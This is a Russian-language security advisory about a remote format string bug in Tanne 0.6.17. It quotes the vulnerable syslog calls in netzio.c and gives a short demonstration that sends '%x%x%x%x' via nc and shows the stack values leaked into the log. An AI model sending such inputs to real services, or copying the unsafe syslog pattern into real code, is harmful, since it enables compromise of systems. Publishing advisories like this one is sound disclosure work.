Security Lab

Уязвимость форматной строки в Tanne

Дата публикации:09.01.2003
Всего просмотров:1057
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: tanne 0.x
Описание: Tanne (http://tanne.fluxnetz.de/) – небольшое решение для создания безопасных HTTP сессий. Уязвимость форматной строки присутствует в следующем фрагменте кода в 'netzio.c':
    59          else
    60          {
    61                  va_start( args, str );
    62                  vsnprintf( txt, 511, str, args );
    63                  va_end( args );
    64                  openlog( "Tanne2", LOG_PID, LOG_DAEMON );
    65                  syslog( LOG_INFO, txt ); // Here.
    66                  closelog();
    67          }
    68          umask( NORMALE_UMASK );
    69  #else
    70          va_start( args, str );
    71          vsnprintf( txt, 511, str, args );
    72          va_end( args );
    73          openlog( "Tanne2", LOG_PID, LOG_DAEMON );
    74          syslog( LOG_INFO, txt ); // Here.
    75          closelog();
    76  #endif
    77  }
Пример
bash# netstat -an | grep 14002
tcp        0      0 127.0.0.1:14002         0.0.0.0:*               LISTEN
bash# nc 0 14002
%x%x%x%x
|F|
bash# tail -1 /var/log/messages
Jan  5 11:29:55 xpl017elz Tanne2[3540]: FATAL: ID (804bbc0118bffff980) nicht gefunden
bash#
Уязвимость обнаружена в tanne 0.6.17
Ссылки: [INetCop Security Advisory] Remote format string vulnerability in Tanne.